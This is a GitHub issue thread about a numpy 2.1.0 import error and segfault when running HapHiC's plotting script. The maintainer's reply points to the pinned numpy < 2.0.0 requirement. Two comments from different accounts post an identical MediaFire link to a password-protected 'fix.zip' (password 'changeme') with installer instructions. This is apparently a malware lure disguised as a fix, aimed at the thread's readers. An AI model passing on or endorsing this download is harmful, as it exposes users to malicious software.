### ISSUE TITLE
I installed the yaml file from github via conda, but put the error in the haphic plot.

### ISSUE THREAD

**Issue by taotaoyuan** [zengxiaofei/HapHiC#54]
OpenBLAS blas_thread_init: pthread_create failed for thread 63 of 64: Resource temporarily unavailable
OpenBLAS blas_thread_init: RLIMIT_NPROC 4096 current, 1030610 max
Traceback (most recent call last):
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/site-packages/numpy/_core/__init__.py", line 23, in <module>
    from . import multiarray
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/site-packages/numpy/_core/multiarray.py", line 10, in <module>
    from . import overrides
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/site-packages/numpy/_core/overrides.py", line 8, in <module>
    from numpy._core._multiarray_umath import (
ImportError: PyCapsule_Import could not import module "datetime"

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/site-packages/numpy/__init__.py", line 114, in <module>
    from numpy.__config__ import show as show_config
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/site-packages/numpy/__config__.py", line 4, in <module>
    from numpy._core._multiarray_umath import (
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/site-packages/numpy/_core/__init__.py", line 49, in <module>
    raise ImportError(msg)
ImportError: 

IMPORTANT: PLEASE READ THIS FOR ADVICE ON HOW TO SOLVE THIS ISSUE!

Importing the numpy C-extensions failed. This error can happen for
many reasons, often due to issues with your setup or how NumPy was
installed.

We have compiled some common reasons and troubleshooting tips at:

    https://numpy.org/devdocs/user/troubleshooting-importerror.html

Please note and check the following:

  * The Python version is: Python3.10 from "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/bin/python3"
  * The NumPy version is: "2.1.0"

and make sure that they are the versions you expect.
Please carefully study the documentation linked above for further help.

Original error was: PyCapsule_Import could not import module "datetime"

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/lx_sky6/yt/soft/HapHiC-main/scripts/HapHiC_plot.py", line 19, in <module>
    import numpy as np
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/site-packages/numpy/__init__.py", line 119, in <module>
    raise ImportError(msg) from e
ImportError: Error importing numpy: you should not try to import numpy from
        its source directory; please exit the numpy source tree, and relaunch
        your python interpreter from there.
Traceback (most recent call last):
  File "/home/lx_sky6/yt/soft/HapHiC-main/haphic", line 117, in <module>
    subprocess.run(commands, check=True)
  File "/home/lx_sky6/yt/soft/miniconda3/envs/haphic/lib/python3.10/subprocess.py", line 526, in run
    raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '['/home/lx_sky6/yt/soft/HapHiC-main/scripts/HapHiC_plot.py', '-h']' died with <Signals.SIGSEGV: 11>.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zengxiaofei** [comment]
The numpy version is incorrect. We use numpy < 2.0.0 in all .yml files. However, the numpy version you used is 2.1.0. Please check your environment. There must have been some changes.

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zengxiaofei** [comment]
Close this issue as there has been no response for two weeks.
